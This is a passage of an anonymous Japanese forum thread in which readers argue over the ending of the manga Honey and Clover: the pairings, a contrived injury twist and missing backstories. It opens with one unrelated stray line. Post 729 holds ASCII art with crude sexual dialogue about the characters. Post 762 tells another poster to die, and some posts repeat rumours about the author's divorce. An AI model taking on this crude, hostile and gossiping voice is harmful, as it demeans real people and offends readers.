主な宗教はチベット仏教で、文化的にチベットとの関わりが深い。

726 :花と名無しさん:2006/09/09(土) 23:16:59 ID:skfy+G850
修が真山と仲がいいのは他の男メンは恋のライバルだったからか

727 :花と名無しさん:2006/09/09(土) 23:18:57 ID:???O
「星のオペラ」なかなか良かった。
「暗記パン」チョイスにワロタw

728 :花と名無しさん:2006/09/09(土) 23:19:24 ID:???O
修と真山が一緒に仲良くしてる雰囲気 嫌い キモイ

729 :花と名無しさん:2006/09/09(土) 23:22:51 ID:???0
          ↓害人真山
          _,..,,__    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄    ↓ 害人臭ちやん
         /:::;;;;;;;;`ゝ  | どんな具合です?               / ̄イエス。 ̄ ̄
        ./;;;;;;;;;-_i´_ ヘ <  はぐのおまんこは。      _,,,......_     ミーのチンポに
        .|iiiiiii人. ` `i〕 \__________  /´ ヾミシ`ヽ.  |. ようやく
       __/ ̄  i、 ノト'´                  _,iヘ_ へ. `!,-、_!<馴染んできた。
      ./       ´ ̄ヽ                / トi_!二l ̄ ノ ヽ \_____
     / / /   /, ,' , ト、              //  ヽl∀)_ノ   `ヽ、
    .l゙ ;;.l l   /, ' , ',ノ ;l             / |    :;, ̄        ヽ、
    .! ;;;l i  l ,' ' ,' ','./ イ             l  io,'  :;l´      、   
    │ _;;ヾヽ |, , ' , 'i″  ヽ            ヽ/ ̄´ `ヽ、 ;o', _;メ、    ヽ
     !  `,! l l; ;', ', ノ;;   ;;l            /      `゙'''''''" ;;;;;ン   
     ヽ;;;;/  ! l  ./;;;;   ;;:! ,/  ̄ミヽ、  ( ( i っ       ;;;;;;;〈 / 
      /゛ ./'´/   ヽ.、 ,,;;;ノ/人ヾ  ..:;ヽ   ,-一!;;:,,     _;;;;:::''''-ヽ/   /   
   巛  !  ;| (、 i_ ̄``ーヾ、リゞヽ, ヾ:::;;;リ  i ,,,;;;;:;ヾξζ/、`、`/ ̄` ノ ≡≡   
.   巛  ト、_i!、`iメゝ' 、`、、ヾf) ノリ  ::;;;;ヽ--┴―'´ ̄`ヽξ 、`、`i l_i_/ ̄ヽ、≡≡
(省略


730 :花と名無しさん:2006/09/09(土) 23:22:51 ID:???0
>>728
俺は笑ったけどな
オクで対局時計物色してるのがよかった

731 :花と名無しさん:2006/09/09(土) 23:29:06 ID:???0
違う話入れるなら10巻一冊分まるまる使って
きちんとハチクロ本編に落とし前つけてほしかったなー。
最後、あまりにも急ぎすぎ。
真山と竹本が最後の夜にアパートで何を語ったのかとか描いてほしかったし
森田がPCの向こうのみ(しかも不在)だなんてがっくり。

ところでニャン太郎が入ってる巻って何巻でしたっけ?
今手元になくてすみません。

732 :花と名無しさん:2006/09/09(土) 23:43:14 ID:???0
もしかしてニャンざぶろうのことか?
それだったら7巻だよ。
ちがうやつのことだったらスマソ

733 :花と名無しさん:2006/09/09(土) 23:47:30 ID:W66JfllHO
あんな道端で拾ったクローバーのサンドイッチなんて
食って竹本は大丈夫なんだろうか。

734 :花と名無しさん:2006/09/09(土) 23:53:00 ID:V0PTDYvtO
浦沢漫画みたいに
コミックに特典でクローバーの形した 何かが挟まってたら感動した

735 :花と名無しさん:2006/09/09(土) 23:54:32 ID:???0
>>734
それいいねぇ

736 :花と名無しさん:2006/09/09(土) 23:57:10 ID:???0
斎藤佑樹VS竹石圭佑
ttp://ex13.2ch.net/test/read.cgi/hsb/1156606494/


737 :花と名無しさん:2006/09/10(日) 00:02:07 ID:???0
>>733
死にはしないさ

738 :花と名無しさん:2006/09/10(日) 00:03:38 ID:???0
あの涙、実は腹痛か・・・

739 :花と名無しさん:2006/09/10(日) 00:05:23 ID:???0
変な料理つくるのはハチクロサンドの伏線か

740 :花と名無しさん:2006/09/10(日) 00:14:31 ID:???0
にゃんまげに
にゃんまげに
にゃんまげに
にゃんまげに
飛びつこう

741 :花と名無しさん:2006/09/10(日) 00:19:24 ID:???0
森はぐはありえん。才能ある人と金が結びついてる森田自身が反則なんだから。
森田はキャラが出来た瞬間から誰ともくっつけない運命にあったでしょ。

742 :花と名無しさん:2006/09/10(日) 00:20:04 ID:???0
バカか?

743 :741:2006/09/10(日) 00:22:51 ID:???0
もちろんバカでつよ。

744 :花と名無しさん:2006/09/10(日) 00:23:20 ID:???0
バカはおまえじゃ。

745 :花と名無しさん:2006/09/10(日) 00:23:23 ID:???0
>>741
結果が出てからそんなこといわれてもねw

746 :花と名無しさん:2006/09/10(日) 00:26:23 ID:QRASf42q0
10巻読みましたぁ。
落ち着くとこに落ち着いたって感じですね。
でも、ちょっと竹本!!って言いたいけど。


747 :花と名無しさん:2006/09/10(日) 00:28:31 ID:???0
>745
最初から当たり前だと思っていたことに関して意外と気づいていない人が多くてびっくり。
得に5人の間でカップルが成立すると思っていると思ってた人がいたのにはびっくり。
話の大前提として成立させないって事で話が進まないと恋愛話としては全然密度が無いし。

空気読めてないなと。

748 :花と名無しさん:2006/09/10(日) 00:29:17 ID:???0
(証明)

>>746>>741
          

             ■


749 :花と名無しさん:2006/09/10(日) 00:30:22 ID:???0
>>746>>741>>747

                ■

750 :花と名無しさん:2006/09/10(日) 00:32:10 ID:???O
名作になれなかった迷作か。
結局なにがいいたかったんだろうか。
青春G☆Jかな。

751 :花と名無しさん:2006/09/10(日) 00:33:42 ID:???0
ここで言われるほど、痛い最終回ではなかったと思う。
ただただ主人公がかわいそうで。寺周りしながら、良い嫁さん見つかると良いね。

ここでは不人気だけど、山田大好きだったよ。真山とくっついて欲しかった。
リカ×真山ってなんかしっくりこないんだよね。

752 :花と名無しさん:2006/09/10(日) 00:38:05 ID:???0
理花が非処女とか言ってる奴。

空気読めてないなと。


753 :花と名無しさん:2006/09/10(日) 00:39:36 ID:???0
やっぱり修→はぐフラグがいつ立ったのかわからないからしっくりこない。
唐突すぎ。
真山が修はぐ喜んでるのもわからない。
真山と竹本がアパート最後のよるにでも、その辺り語り合う描写でもあれば理解できたのにな。
それ以外は打算でも現実路線でもそれなりに理解できるからいいんだけど。

754 :花と名無しさん:2006/09/10(日) 00:39:57 ID:???0
竹本はともかく森田はかわいそうだ
いかんせん、スタート時点で男性数が多すぎたのが原因かかといって
竹×森はできないし・・・・

755 :花と名無しさん:2006/09/10(日) 00:42:51 ID:???0
>753
羽海野的には、修=真山=野宮だから、喜んで当然なんだ。

違和感があるったらあるかも知れんけど。

756 :花と名無しさん:2006/09/10(日) 00:42:53 ID:???0
真山が喜んでたのは、理科を修に取られる心配がなくなったからという意見をここで読んだ気がする。
それなりに納得した。


757 :花と名無しさん:2006/09/10(日) 00:44:51 ID:???0
ねぇねぇ、10巻で森田とはぐってヤッタの?

758 :花と名無しさん:2006/09/10(日) 00:47:41 ID:???0
ちいさすぎて入らなかったらしい

759 :花と名無しさん:2006/09/10(日) 00:51:23 ID:???0
>>756
ああ、納得かも。
真山は理科がらみなら、竹本の気持ちなんかころっと忘れそうだね。
ページに余裕があったらあとで竹本に会って内心申し訳なく思う描写くらいあったかな。

760 :花と名無しさん:2006/09/10(日) 00:51:23 ID:???0
最近はイイ感じになじんできたよ

761 :花と名無しさん:2006/09/10(日) 01:03:15 ID:???0
はぐと修が人生を供にする、ってのは別にアリだと思うんだけど
そこに「恋愛」を持ち込んだのが作者の失敗だったと思う。
森田や竹本との異性としての「恋愛」よりも、
強い「家族愛」で繋がってる修との安心感を選択した、って展開の方が
これまでの伏線ともあってたような・・・
ま、映画やアニメとの販売戦略など、大人の事情があって
切り詰めた挙句の愚挙だと思っていたい(笑)

762 :花と名無しさん:2006/09/10(日) 01:04:33 ID:???0

 日
  の
   く
    せ
     に
      え
       ら
        そ
         う
          。
           だ
            か
             ら
              し
               ね

763 :花と名無しさん:2006/09/10(日) 01:11:54 ID:???0
カプ成立したとこよりも山田と森田とか、
修と理花みたいな関係のほうが良いと思った。
表紙とか扉絵とかイラスト関係だと山田と森田が
よく手繋いでてほのぼのする。
結局恋愛関係にならないほうが良く見えるのは何でだろ。

764 :花と名無しさん:2006/09/10(日) 01:14:19 ID:???0
むしろそれが気持ち悪いと思う人もいる

765 :花と名無しさん:2006/09/10(日) 01:14:48 ID:???0
10巻が短編で穴埋めしているのとか考えると、アニメ化合わせでコミクス9・10巻出すために
打ち切りのごとく短縮されたのかなとか思えてきちゃうなぁ。
コーラスってハチクロ付録付けたりして釣るのに必死だな、って感じだし。
最終回前のコーラス予告に最終回マークなしで最終回に突入しちゃったりして
作家自身だけじゃなくて編集側のほうも迷走していたのかな。

766 :花と名無しさん:2006/09/10(日) 01:18:23 ID:???0
自分とはぐを同化させている人には
ものすごく気持ちのいいマンガだよね。
ハーレクインロマンスというか。

767 :花と名無しさん:2006/09/10(日) 01:19:21 ID:???0
はぐと同化させているといったら…

768 :花と名無しさん:2006/09/10(日) 01:19:37 ID:???0
>>732
ありがとう!!ニャンざぶろうのことでしたw
誰だよニャン太郎ってorz

769 :花と名無しさん:2006/09/10(日) 01:21:50 ID:???0
森田のお父さんはどうしちゃったのかなあ

770 :花と名無しさん:2006/09/10(日) 01:27:47 ID:???0
>>763
25過ぎたオトナが手をつないでなかよしこよし。ってキモイ。小学生かよ。

771 :花と名無しさん:2006/09/10(日) 01:28:41 ID:???0
2chスレで、羽海野さん離婚歴ありという書き込みを読んだんだけど
「空の小鳥」は実話なのかなぁと思った。

772 :花と名無しさん:2006/09/10(日) 01:33:24 ID:???0
>753
修→はぐ説明不足、同意。
山田に説明するのを「勘弁して」っていうのは、修のキャラとしてはありでも
それまで作中で全然そんな伏線なかったんだから読者には説明しろと思った。
ハチクロって一つ一つのエピソードは何となくいい話っぽいから
おいしいシーンだけつまみ食いで読めばそれなりに楽しめるかもしれないけど、
全10巻の1本の作品として見ると5、6巻あたりからストーリーになってなくて駄目駄目。

773 :花と名無しさん:2006/09/10(日) 01:37:37 ID:???O
>769
私もそれすごい気になる。馨と忍は誰が育てたの?
自暴自棄になって子供捨てて失踪するような人じゃないよね。
森田父ならいくらでも就職やら起業できそうじゃん。

774 :花と名無しさん:2006/09/10(日) 01:38:38 ID:???0
UのDVDを買おうと思っていたが買わなくてすんだわ

775 :花と名無しさん:2006/09/10(日) 01:44:26 ID:???0
>>773
それよりりっちゃんは・・・

776 :花と名無しさん:2006/09/10(日) 01:44:35 ID:???0
DVD非常に分かりづらいんだが
初回限定版と第何巻って表示されてる奴と何が違うんだ?

777 :花と名無しさん:2006/09/10(日) 01:46:34 ID:???0
りっちゃんて誰?

778 :花と名無しさん:2006/09/10(日) 01:47:02 ID:???0
あゆと真山の1巻の会話の補完に頑張った感が伝わって笑った

779 :花と名無しさん:2006/09/10(日) 01:51:36 ID:???0
鳩とかリーダーが宇宙にどうしたこうしたとかいうのも無理矢理ぽくてなんか笑える

780 :花と名無しさん:2006/09/10(日) 01:51:58 ID:???0
>>777
森田母

781 :花と名無しさん:2006/09/10(日) 01:55:33 ID:???0
母は病気とかで死んだんじゃない?

782 :花と名無しさん:2006/09/10(日) 02:10:53 ID:???0
記憶のある年齢で死亡:森田父、竹本父、リカ父、原田
物心つく頃には死亡済み?:森田母、はぐ母、リカ母

物語に絡めておきながら大半は本編中では詳細は不明。(わかるのは竹本父と事故の原田くらい?)
そして配偶者を亡くした人の再カップル率100%か。
そういや、カレーの日のカレーって最初はてっきり森田母が作ってるんだと思ってたけど、死亡してたとすると
作ってたのは森田兄?

783 :花と名無しさん:2006/09/10(日) 02:17:30 ID:???O
改めて考えると人死にすぎ…

784 :花と名無しさん:2006/09/10(日) 02:18:04 ID:???0
>>781
野球の応援の時あんな元気そうだったのに・・・
(ちょっと山田似かも)

785 :花と名無しさん:2006/09/10(日) 02:19:08 ID:???0
人間なんていつ何があるかわからんからな

786 :花と名無しさん:2006/09/10(日) 02:21:00 ID:???0
人の死はお手軽に悲劇的になるからな

787 :花と名無しさん:2006/09/10(日) 02:21:55 ID:???0
  ''';;';';;'';;;,.,                  ザッ
   ''';;';'';';''';;'';;;,.,   ザッ
   ;;''';;';'';';';;;'';;'';;;
    ;;'';';';;'';;';'';';';;;'';;'';;;
      vymyvwymyvymyvy     ザッ
ザッ    n_n,n_n、n_n,n_n、n_n,n_n、
      ∩_∩^−^∩_∩^−^∩_∩^−
  ザッ   ∩__∩ ∩__∩ ∩__∩ ∩__∩
         ∩_ ∩__∩ ∩__∩ _∩ ∩_    ザッ
     ∩___∩    ∩___∩ ∩___∩ ∩___∩
     | ノ      ヽ   | ノ      ヽ | ノ      ヽノ      ヽ
     /  ●   ● | /  ●   ● |  ●   ● | ●   ● |
    |    ( _●_)  ミ |    ( _●_)  ミ  ( _●_)  ミ  ( _●_) ミ
    彡、   |∪|  、` 彡、   |∪|  、`\ |∪|  、`\ |∪| 、`\
   / __  ヽノ / / __  ヽノ /´>  ) ヽノ  / ノ //ヽノ /´>  )
   (___)   / (___)   / (_/_)   / (_/    / (_/

788 :花と名無しさん:2006/09/10(日) 02:22:17 ID:lyppL7BJO
修はぐが気に入らないってもう終わったのを言ってもしょうがないだろ

789 :花と名無しさん:2006/09/10(日) 02:22:42 ID:???0
          ザッザッザ・・・     ''';;';'';';''';;'';;;,.,
                        ;;''';;';'';';';;;'';;'';;;
                        ;;'';';';;'';;';'';';';;;'';;'';;;
                        vymyvwymyvymyvy、
     未来からきました      MVvvMvyvMVvvMvyvMVvv、   未来からきました
                   ,ィ乃\−^,ィ乃\^−^,ィ乃\^,ィ乃\
              ,ィ了乃\ ,ィ了乃\ ,ィ了乃\ ,ィ了乃\ ,ィ乃ブ\
         ,.,ィ了「乃ブ\ ,ィ了「乃ブ\ ,ィ了「乃ブ\ ,ィ了「乃ブ\ ,ィ了「乃ブ\   未来からきました
      ,ィヘ了「厂{  乃ブ\_   ,ィヘ了「厂{  乃ブ\ _,ィ乃\,ィヘ了「厂{  乃ブ\_
      _> >'' "´  ̄ ̄ `''<∧l>_> >'' "´  ̄ ̄ `''<∧l>、 _> >'' "´  ̄ ̄ `''<∧l>、
     (/   〃     ヽ \ (/   〃     ヽ \  (/   〃     ヽ \ ハ
     ./,/ / /イ!      ハ . /,/ / /イ!      ハ  ', . /,/ / /イ!      ハ  ',巧 ',
    /〃 l / !l   {     !l ./〃 l / !l   {     !l   ./〃 l / !l   {     !l   Y  !
    l/li  lィ!‐、 { {  lヽ- 、 !| l/li  lィ!‐、 { {  lヽ- 、 !|  .l/li  lィ!‐、 { {  lヽ- 、 !|  j  l|
     {{  :N   ヽ\_{ \ リ  {{  :N   ヽ\_{ \ リ  /  {{  :N   ヽ\_{ \ リ  /   |
      \ハ ,ィ=ミ   ィ=ミV!iイ }\ハ ,ィ=ミ   ィ=ミV!iイ }i  \ハ ,ィ=ミ   ィ=ミV!iイ }i  |
       i`ハ/// '_ /// j レ' ! i`ハ/// '_ /// j レ' !! l i`ハ/// '_ /// j レ' !! l
       _リ_|i >、 `ー'  ,.ィ .| | j_リ_|i >、 `ー'  ,.ィ .| | jLiァ_ リ_|i >、 `ー'  ,.ィ .| | jLiァゝ-、
     /  | |__,≧r=≦チ{_/ ル/  | |__,≧r=≦チ{_/ ル´( /  | |__,≧r=≦チ{_/ ル´(、   〉
    ({    l | |   人.  / / {    l | |   人.  / / _({    l | |   人.  / / __ぅヽ  {

790 :花と名無しさん:2006/09/10(日) 02:23:17 ID:???0
                      ''';;';';;'';;;,.,                  ニコニコ
                       ''';;';'';';''';;'';;;,.,   ニコニコ
       ニコニコ            ;;''';;';'';';';;;'';;'';;;
                     ;;'';';';;'';;';'';';';;;'';;'';;; ;;'';;'';;;
                  ;;'';';';;'';;';'';';';;;'';;'';;;;;'';';';;'';;';'';';';;;'';;'';;;
ニコニコ         /⌒ヽ/⌒ヽ/⌒ヽ /⌒ヽ/⌒ヽ/⌒ヽ            ニコニコ
        ___   .(/ ̄ ̄ ̄\( ^ω^(^ω^(^ω^/ ̄ ̄ ̄\    .___
      /      \/        \./  ̄ ̄ ̄\. /         \ ./      \
   /          \. ⌒   ⌒ /          \  ⌒   ⌒ ./        \
  /   ⌒   ⌒   \(__人__)/   ⌒   ⌒   \. (__人__)/    ⌒   ⌒   \
  |      (__人__)    |     |      (__人__)     |       |.       (__人__)    .|
  \             /     .\             /      \            /

791 :花と名無しさん:2006/09/10(日) 02:23:55 ID:???0
                      ''';;';';;'';;;,.,
                       ''';;';'';';''';;'';;;,.,                
                        ;;''';;';'';';';;;'';;'';;;               
                        ;;'';';';;'';;';'';';';;;'';;'';;;           
                       n n n: n.n,.n;:.n.n           
                       ,--、 ,--、 ,--、 ,--、 ,--、     
                    r―、 ---   r―、 r―、 r―、
                   __ ;――、 __ ;――、   __
                 ,--------、  ,------- 、   ,-------、`
              r-―――、    ,:―――――、  ,:――――、
     γ――――――、     γ――――――、     γ―――――-、
  / ̄ ̄ ̄ ̄ ̄ ̄\  \ / ̄ ̄ ̄ ̄ ̄ ̄\  \/ ̄ ̄ ̄ ̄ ̄ ̄\  \/ ̄ ̄ ̄ ̄
/               \ /            \ /             \ /
                 ヽ               ヽ               ヽ
                :::::::::|               :::::::::|              :::::::::|           :
 (●)     (●)  ..:::::::::::| (●)     (●)  ..:::::::::| (●)     (●)  .:::::::::::|(●)     (●) ..::
   \___/  .:::::::::::::::::|  \___/  .:::::::::::::::|  \___/  .:::::::::::::::::|  \___/
    \/  .::::::::::::::::::::ノ     \/  .::::::::::::::::::ノ    \/  .::::::::::::::::::::ノ     \

792 :花と名無しさん:2006/09/10(日) 02:32:24 ID:???0
達夫が母親に「お前の好きなりっちゃんは嫁にきてくれないかね」
と言われた時の答えは
「りっちゃんはもう(結婚して子供が二人もいる)」なのか
「りっちゃんはもう(死んだ)」なのかどっちなんだろう。

793 :花と名無しさん:2006/09/10(日) 02:44:05 ID:???0
そのシーンは切なくなる…

794 :花と名無しさん:2006/09/10(日) 02:53:53 ID:???0
>>792
そのシーン見て、小さい会社の中でもそれなりの
地位にありそうな人がなんであんなにせせこましくて
決して裕福ではない(むしろ貧しそう)な環境にあるんだろう…
って不思議に思った。

795 :花と名無しさん:2006/09/10(日) 02:54:00 ID:???0
達夫はほんとに不幸を背負わされすぎ
森田親子よりかわいそう

796 :花と名無しさん:2006/09/10(日) 03:04:16 ID:???O
>>794-795
才能も人望もあり輝いている森田父を引き立てるための
薄汚い負け組がどうしても必要だったんだよ

無理があるとか関係なく
殊更惨めな姿を晒してもらえればそれでいいんだろ


797 :花と名無しさん:2006/09/10(日) 03:21:23 ID:???0
達夫も森田父が好きだったから会社に入ってたんだろうけどね。
病気にならなければ裏切りもなかったかも…
お母さんのためもあるだろうけど小さい森田兄弟をまきこんじゃうのはよくないよなぁ。
やっぱりあの時点でりっちゃんはもういなかったのかもね
好きな子に直接あんな不幸爆弾は落とせないでしょ。

798 :花と名無しさん:2006/09/10(日) 03:25:43 ID:???O
それが達夫と竹本の存在理由

何だかんだいって愛がないんだよな、作中のどの人物に対しても

天才キャラも平凡キャラも主要キャラも脇キャラも
幸せエピソードも不幸エピソードも無神経で唐突で脈絡なくて
愛着を持って描いているのが微塵も伝わらない

この流れであの最終巻は結構マシに終われた方だと思う
もっとぶっ壊れまくりかと思って爆笑の準備してたのに

少なくとも自分は
修が「恋したっていーじゃない!」(ビビる大木)と叫び大の字ジャンプしたら
ファン(嫌いの向こう側)になれたかもしれない


799 :花と名無しさん:2006/09/10(日) 03:29:54 ID:???O
森田父は会社を潰されても才能があるんだから、ちょっとくらい妥協して
どこぞの会社にでも入ってれば森田兄弟もひもじい思いしなくても済んだんだよなぁ。

800 :花と名無しさん:2006/09/10(日) 03:53:02 ID:???O
クローバーって食べれるの?(素朴な疑問)

801 :花と名無しさん:2006/09/10(日) 03:59:32 ID:???0
>>800
シロツメクサなら食べられるみたいよ。
小学校のウサギがシロツメクサが好きでよく食べさせてました。
Yahoo!検索 - 食べられる野草 シロツメクサ
ttp://search.yahoo.co.jp/search?p=%E9%A3%9F%E3%81%B9%E3%82%89%E3%82%8C%E3%82%8B%E9%87%8E%E8%8D%89%E3%80%80%E3%82%B7%E3%83%AD%E3%83%84%E3%83%A1%E3%82%AF%E3%82%B5&ei=UTF-8&x=wrt&meta=vc%3D


802 :花と名無しさん:2006/09/10(日) 04:07:25 ID:???0
シロツメクサの花が咲いたら さぁ ゆこう ラスカール

803 :花と名無しさん:2006/09/10(日) 04:18:29 ID:???0
最終巻の最終話って加筆ありましたよね?

804 :花と名無しさん:2006/09/10(日) 04:25:32 ID:???0
>>803
このスレ読んでると、加筆されてるらしいね。
自分はコミックの方しか読んでないからわからん。
どの部分が加筆なの?

805 :花と名無しさん:2006/09/10(日) 05:11:51 ID:???0
このスレにいるアンチ/ややアンチな人たちから見て、
「成功してる」(ハチクロが何らか失敗しているとして)少女マンガはどういうものなのかな?
具体的な作品名が出てくるとうれしい。

俺は最後まで読んで、最初に「全員片思い」とか無茶な状況を作ったわりには
きれいに着地してると思ったんだけど、
それはふだんジャンプ系とか読んでるせいなのかなと思ってて。
いい作品が知りたい。

806 :花と名無しさん:2006/09/10(日) 05:23:39 ID:???0
10巻の中身についてはこのスレの住人ほどさほど冷めた気分にもならんが
結局 あの偶然すぎる怪我がなけりゃどうなってたんだって話だな
つまり 完結のために怪我をさせましたという見え見えの転機はやはり強引すぎる
あんな展開にしなければ完結に辿り着けなかったならばやっぱB級だわな
まーあの無理やりにしてはうまく終わらせたほうだと思うけどね
もっと最悪だって有り得たはず

807 :花と名無しさん:2006/09/10(日) 05:36:15 ID:???0
>>806
俺もあれはVIPPERよろしく「超展開キタコレwww」と思ったけど、
片道矢印だけで安定的な関係を築いてしまった
(しかもそれが作品の雰囲気作りに貢献していた)以上、
それを揺り動かして落としこむにはあのくらい偶然に頼らないと
難しいのかなと思ったり思わなかったり。
もうちょい納得の行く関係の崩し方はあったのかねえ。

808 :花と名無しさん:2006/09/10(日) 05:47:09 ID:???0
>>805
そういう質問って擁護派の方がよく使いますが
どんな名作挙げても叩かれるだけなので普通の神経持ってたら答えないと思うし

ハチクロはあくまでハチクロなんでいくら同じ少女漫画でも
他の何かと比較するってのはおかしいんじゃないのかな
ここでの批判もこの作品に比べて劣るからとかそういう視点じゃなくて
単純にハチクロ内におけるものに終始してるしね
ジャンプ作品だってそういうことは同じじゃないの

809 :花と名無しさん:2006/09/10(日) 06:20:37 ID:???O
元社長の家は本物の森田家なのか城山が作った森田家そっくりなレプリカなのかどっちなんだ。
あれ家の所在地は海外だよね

810 :花と名無しさん:2006/09/10(日) 06:26:20 ID:???0
>>808
> どんな名作挙げても叩かれるだけなので普通の神経持ってたら答えないと思うし

そんなものか。まぁ強者がいたらぜひ。

> 他の何かと比較するってのはおかしいんじゃないのかな

「比較するのはおかしい」までいくと言い過ぎな気はするけど、
ハチクロ内の「無理」から批判が出てるつーのはその通りだろうね(共感もする)。
ただそれだと、「現にある作品の中ではうまくいってるほうだ」という評価に
対抗できないのがね(特にやめろというつもりはない、2chだし)。
ジャンプ作品への批判も・・・まぁそういう感じかな。

>>809
たしかにバス停にBUS STOPって書いてあるね

811 :花と名無しさん:2006/09/10(日) 06:27:58 ID:???O
暗記パンって○ンコしたら記憶なくなるんじゃなかったっけ?

812 :花と名無しさん:2006/09/10(日) 07:13:43 ID:sHsHotfk0
↑うん、なくなるよ。

ホント、怪我しなかったらまとまってないね。そういえば・・。
でも現実でもなんか偶然なきっかけで物事が動くことはよくあるよね。


813 :花と名無しさん:2006/09/10(日) 07:14:58 ID:uCwv7SWD0
怪我はマジやっつけだよな
でも漫画なんてどれも所詮そんなもんだ

814 :花と名無しさん:2006/09/10(日) 08:16:40 ID:???0
はぐ修は本当に妙。ケコーンするかな?

815 :花と名無しさん:2006/09/10(日) 08:59:11 ID:???0
つまんねかった
ネガティブエンド

816 :花と名無しさん:2006/09/10(日) 08:59:52 ID:???0
作者の頭の中ではのちのち森田と山田がくっつくことにでもなってるのか?

817 :花と名無しさん:2006/09/10(日) 09:12:48 ID:???0
なってないだろ

818 :花と名無しさん:2006/09/10(日) 09:29:06 ID:???0
くっつかないからこそ安心してイチャつかせてるんだと思うよ。

819 :花と名無しさん:2006/09/10(日) 09:30:53 ID:???0
親バカ設定修がはぐに恋愛感情持つのが有りだとすると
山田が森田に恋愛感情持ったり
美和子が真山に大好きよ!とか言って
野宮が姐さんが青春してくれてオレ嬉しいっすよ
山崎のことはこうなるようにしか流れてなかったとか言い出すのも有りかも。

820 : ◆E6wyrLUoXk :2006/09/10(日) 09:35:10 ID:???O
事故→怪我→さっそうと助けにいく→入院→俺が守る
この手はよく中坊の時好きな女で妄想した
災害バージョン戦争バージョン生物兵器バージョンとか
はぐの場合、それにプラス心の病だからな
中二病展開すげえよかった
熱い気持を思い出した

でも実際は好きな女に何か起こっても
竹本みたいに蚊帳の外で何もできないんだよなあ

821 :花と名無しさん:2006/09/10(日) 09:59:05 ID:???0
>>800
探偵ファイルとかいうところで
10日間くらいを雑草のみ食って過ごすってのやってた。
雑草の中でもクローバーはなかなかいけると書いてあった。すっぱいらしい。

822 :花と名無しさん:2006/09/10(日) 10:06:09 ID:???0
無理矢理に臭とはぐをくっつたりしないで
「今は恋愛(=森田)じゃなく、自分が自立できるように芸術(=臭)を選んだ」
ってことにしとけばよかったのに。
臭とはあくまで家族愛のような関係で、臭の感情もあくまで父親的な
「手が治って自立したら俺の元から巣立って行くんだろうな」っていう。
そしたら今までのはぐ→森田感情もおかしくないし、修は脱臭できるし、
真山の「恋愛に生きるかそれ以外に生きるかはその人の本能」って言葉や
野宮のピントのはずれた例え話もそれなりに理解できるのに・・・

823 :花と名無しさん:2006/09/10(日) 10:17:42 ID:???0
ウミノの演出はクサすぎ

824 :花と名無しさん:2006/09/10(日) 10:19:15 ID:???0
>修は脱臭できるし
ワロタw

825 :花と名無しさん:2006/09/10(日) 10:55:02 ID:???0
>恋愛に生きるかそれ以外に生きるかはその人の本能

・・・・古いよな〜・・・
そんなの二者択一じゃないってわかっていなきゃならない歳だろ?ウミノさん・・・

826 :花と名無しさん:2006/09/10(日) 10:59:31 ID:???0
>>822
禿同。なんで無理やり恋愛に持っていくかな〜修&はぐ
見守る愛でいいじゃないかよう。
>>809
元社長への内緒の援助(借家)は、
昔の家に似ているのをアメリカで探して、カブたんだけ作って
置いといたんじゃないのかな?
しかし、カブたんから森田家の援助がばれたらどーすんだよ…と ちとオモタ

827 :花と名無しさん:2006/09/10(日) 11:08:36 ID:???0
つーか森田父はどこでアボンした?
消滅したかのようにまったくふれられんのは作者がなにも考えてなかったから?

828 :花と名無しさん:2006/09/10(日) 11:16:13 ID:???0
森田父はトーチになったんだよ^^

829 :花と名無しさん:2006/09/10(日) 11:25:09 ID:???0
臭ははぐに対して家族愛的なものしか
持ってないと思ってたから
この終わり方は納得出来ん。


830 :花と名無しさん:2006/09/10(日) 11:29:03 ID:???0
ウミノさんが離婚しないで幸せな結婚と仕事を両立できてたら
こんなラストにならんのだろうな。

831 :花と名無しさん:2006/09/10(日) 11:33:15 ID:???0
>>827
そりゃーまー
達夫母やらあっさり解雇されら社員たちの面倒をみるため
一生懸命働いているうちに・・・・・・

832 :花と名無しさん:2006/09/10(日) 11:39:19 ID:+Tj8mTstO
でも最後の4ページの竹本には感動した

833 :花と名無しさん:2006/09/10(日) 11:39:30 ID:ZMUr1HzbO
>>827
それはだいたい想像で 死んだと思えるんじゃね

834 :花と名無しさん:2006/09/10(日) 11:44:36 ID:???0
森田父の会社は基本的に小さかったと思われるからな。
権利関係と財産を奪われ、大手に背いたら他に稼ぐ道ないからなあ。
大手は業界中と取引があるんだから、
そこから締め出しくらったら業界中に身を置くところがなくなるんです。

835 :花と名無しさん:2006/09/10(日) 11:45:51 ID:???0
想像で補完、想像で補完…
その繰り返しに疲れました

836 :花と名無しさん:2006/09/10(日) 11:46:27 ID:???0
未開発地域で商品開発中の森田父「生きてるからっ!!!」

837 :花と名無しさん:2006/09/10(日) 11:51:20 ID:???O
P60〜62の山田がなんか 面白いw

838 :花と名無しさん:2006/09/10(日) 11:52:14 ID:???0
取ってつけたように最後ハチミツとクローバー出てきたな。

839 :花と名無しさん:2006/09/10(日) 11:53:42 ID:???0
達夫と心中したんじゃないの
あの世でも恨むとかウホッて

840 :花と名無しさん:2006/09/10(日) 11:55:15 ID:???0
あんなパトレイバーの後藤隊長みたいなのとウホじゃ絵的に…

841 :花と名無しさん:2006/09/10(日) 11:56:44 ID:???0
>>838
あのサンドイッチに塗ってあったのはハチミツだったのか

関係ないけど9巻読んでいて
ソーメンの薬味には生姜使えばいいじゃんと思った
生姜ならスペインにもあるだろうに

842 :花と名無しさん:2006/09/10(日) 11:59:08 ID:???0
チューブで持ってったらいいじゃん

843 :花と名無しさん:2006/09/10(日) 11:59:47 ID:???0
大体植物の種って簡単に持ち込んでいいの?

844 :花と名無しさん:2006/09/10(日) 12:00:46 ID:???0
ダメかもしれんが持ち込むのは簡単だしな

845 :花と名無しさん:2006/09/10(日) 12:01:03 ID:???0
胎内に隠し持っておけばok<植物の種

846 :花と名無しさん:2006/09/10(日) 12:09:59 ID:???0
実際海外旅行すればそんなことしなくてもスルーなのはわかるが。
英語わからなきゃさらに無意識に持ち込めるw

847 :花と名無しさん:2006/09/10(日) 12:12:27 ID:???0
セイタカアワダチソウやアメリカシロヒトリが日本の風景を台無しにしたんだ
山田のバカ

848 :花と名無しさん:2006/09/10(日) 12:28:02 ID:???0
>>842
昔は全然平気だったのに
その都度ショウガをすり下ろして使うようになったら
チューブのショウガは入れない方がマシな物体になったよ。

849 :花と名無しさん:2006/09/10(日) 12:34:34 ID:???0
捨ててくだサイ

850 :花と名無しさん:2006/09/10(日) 12:37:18 ID:???0
誰か、ハチミツをツユに
クローバーを薬味にソーメン食べる奴はいないのか?

>>847
セイタカアワダチソウが育ちやすい環境というのは
